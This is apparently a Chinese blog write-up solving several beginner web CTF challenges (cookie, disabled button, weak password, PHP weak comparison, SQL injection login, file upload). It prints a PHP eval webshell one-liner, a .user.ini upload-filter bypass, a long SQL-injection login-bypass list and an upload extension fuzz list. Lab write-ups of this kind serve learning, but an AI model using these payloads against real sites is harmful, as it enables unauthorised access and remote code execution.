攻防世界Cookie,disabled_button,weak_auth,simple_php,baby_web,inget,easyupload 题目WP

Cookie

进来之后看到主页面

 这里涉及到cookie是类似于一种用户凭证之类的东西,尝试着抓包看一下

cookie指向了一个cookie.php文件,进行访问

disabled_button

进行f12查看按钮属性

删除点击即可

weak_auth

进行密码爆破账号固定为admin

 

 密码为123456

simple_php

get方式传入一个a和b,然后判断a是否为0成立就输出一半flag(弱类型比较),使用函数is_numeric判断b中是否存在数字或数组,存在则退出,然后判断b是否大于1234大于则输出剩下一半

/?a=0asd&b=12345a

弱类型==中 1234 和1234a进行比较结果为true或者111a和111也为true

baby_web

根据提示页面看到说初始页面是哪个,基本上是index.php了访问之后发现立即跳转到了1.php也买你,抓包进行仔细观察

 flag被隐藏,查看hex编码

inget

好家伙bypass绕过先输入?id=1尝试 ,不想进行手工判断,使用万能密码进行fuzz

成功了不少,万能密码放在文末 

easyupload

 

是一个文件上传,先上传一个png文件成功,然后判断是否为黑名单上传一个txt文件也成功了,目测应该是黑名单判断

尝试上传php5 Phtml 等

 

进行文件上传后缀名FUZZ发现可以上传成功.htaccess,先去判断一波对方中间件 

目标为nginx中间件尝试使用.user.ini文件进行利用

可以上传,这里有个坑他对文件的Content-Type也进行了判断需要使用图片类型格式进行绕过

user.ini内容为 GIF89a
auto_prepend_file=a.png指向a.png文件当php使用

在上传a.png的时候发现会对文件内容进行检测是否有php这里可以尝试无php写马

GIF89a

 <?=eval($_GET['cmd']);?>

或者

<? system("tac /flag"); ?>

下面是万能密码

"or “a”="a
“or 1=1–
“or”=”
“or”="a'='a
“or1=1–
“or=or”
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1–
1'or'1'='1
a'or' 1=1–
a'or'1=1–
or 'a'='a'
or 1=1–
or1=1-- asp aspx "or “a”="a
'.).or.('.a.'='.a
or 1=1–
'or 1=1–
a'or' 1=1–
"or 1=1–
'or.'a.'='a
“or”="a'='a
'or''='
or'='or' jsp 1'or'1'='1
admin' or 1=1/*
"or "a"="a
'.).or.('.a.'='.a 
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or.'a.'='a
"or"="a'='a
'or''='
'or'='or'
admin'or 1=1#
admin'/*
aaaa*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
"or "a"="a
 ')or('a'='a
or 1=1¨C
'or 1=1¨C
a'or' 1=1¨C
"or 1=1¨C
'or'a'='a
"or"="a'='a
'or"='
'or'='or'
1 or '1'='1'=1
1 or '1'='1¡ä or 1=1
'OR 1=1%00
"or 1=1%00
'xor
admin' or 'a'='a
'or 1=1/*
something
'OR '1'='1
1'or'1'='
admin' OR 1=1/*
' or 1=1#
'=0#
'>-1#
'<1#
1'<99#
'=0=1#
'<=>0#
'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#
'|0#
'&0#
'^0#
'<<0#
'>>0#
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#
'*9#
'/9#
'%9#
'+0#
'-0#
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#
'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#
'=upper     (0)#
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#
'='
'<>'1
'>1='
0'='0
'<1 and 1>'
'<>ifnull(1,2)='1
'=round(0,1)='1
'*0*'
'+'
'-'
'+1-1-'
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#
' or 1=1#
' or '
' || '

下面是文件后缀名FUZZ

.jpg
.png
.gif
.php
.phtml
.PHP
.Php
.pHp
.phP
.php2
.php3
.php4
.php5
.php6
.php7
.pphphphpp
.htaccess
.php 
.php::$DATA
.php.
.php. .
.php%00.jpg

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
对于"disabled_button"的攻击和防御,以下是一些可能的措施: 攻击: 1. 用户端注入攻击:攻击者可能尝试通过修改用户端代码来绕过按钮禁用功能。为了防止这种攻击,应该在服务端进行输入验证和安全性检查,并在用户端使用合适的安全控件。 2. 脚本注入攻击:攻击者可能尝试通过向输入字段注入恶意脚本来绕过按钮禁用功能。为了防止这种攻击,应该对输入进行严格的过滤和转义,确保用户输入不会被当作代码执行。 防御: 1. 服务端验证:在接收到用户请求时,服务端应该对请求进行验证,确保用户具有执行相应操作的权限。如果用户没有权限执行操作,服务器应该返回错误信息,并阻止操作的执行。 2. 前端控制:在前端页面中,可以使用JavaScript等技术来禁用按钮。通过设置按钮的disabled属性,可以防止用户通过点击按钮来触发操作。同时,还可以通过合适的前端框架或库来进行表单验证,确保用户输入的有效性。 3. 输入过滤和转义:在接收用户输入时,应该对输入进行过滤和转义,以防止恶意脚本注入攻击。可以使用合适的编程语言或库来进行输入验证和处理,确保用户输入的安全性。 需要注意的是,以上只是一些常见的防御措施,具体的实施方法和技术取决于具体的应用场景和开发环境。在开发过程中,应该结合具体的需求和安全威胁来选择合适的防御策略。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值